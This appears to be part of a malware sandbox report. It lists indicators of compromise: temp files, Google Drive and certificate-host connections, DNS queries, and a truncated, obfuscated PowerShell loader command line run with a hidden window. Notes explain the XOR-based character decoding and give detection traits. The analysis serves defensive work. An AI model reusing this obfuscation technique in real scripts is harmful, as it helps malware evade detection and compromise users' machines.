Technical Information
- %TEMP%\statuernes.txt
- %WINDIR%\temp\cab2b16.tmp
- %WINDIR%\temp\tar2b27.tmp
- %WINDIR%\temp\cab2c6f.tmp
- %WINDIR%\temp\tar2c70.tmp
- %WINDIR%\temp\cab2b16.tmp
- %WINDIR%\temp\tar2b27.tmp
- %WINDIR%\temp\cab2c6f.tmp
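- %WINDIR%\temp\tar2c70.tmp
- Note: the four cab*.tmp / tar*.tmp paths are listed twice; presumably one list was headed "created" and the other "deleted", and the headings are missing from this copy. Short-lived cab/tar temp files of this kind are typically left by Windows certificate retrieval during TLS validation, so on their own they are weak indicators.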
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
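- http://pk#.goog/gsr1/gsr1.crt (the `#` appears to be a masking character inserted by the report, not part of the hostname; a plain-HTTP request for a .crt file is consistent with certificate-chain retrieval by the TLS stack rather than payload traffic)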
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
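- DNS ASK drive.usercontent.google.com
- Note: all of the hosts above belong to legitimate Google services that ordinary users also reach, so they are not usable as blocklist indicators by themselves. The useful signal is the process context: the report also lists powershell.exe started with a hidden window, presumably the source of these connections.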
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Skossens Countercharges Overliterariness Dynamised Amices Fastprisordning #>;$Cordyceps=(cmd /c set /A 115^^0);Function Forhaandsudtalelsernes ([String]$Reimposed){$Cordyceps=[char][int]$Cor...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Skossens Countercharges Overliterariness Dynamised Amices Fastprisordning #>;$Cordyceps=(cmd /c set /A 115^^0);Function Forhaandsudtalelsernes ([String]$Reimposed){$Cordyceps=[char][int]$Cor...
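- '<SYSTEM32>\cmd.exe' /c set /A 115^^0
- Note: `set /A 115^^0` evaluates 115 XOR 0 (`^^` is an escaped `^`), which is 115; the PowerShell line above casts the result with `[char][int]`, so the script appears to derive a character at runtime instead of writing it literally. The command line is truncated in the report ("..."), so the rest of the script is not shown. For detection, the visible traits are powershell.exe with a hidden window, a command line opening with a `<# ... #>` comment of unrelated words, and a child cmd.exe running `set /A` arithmetic.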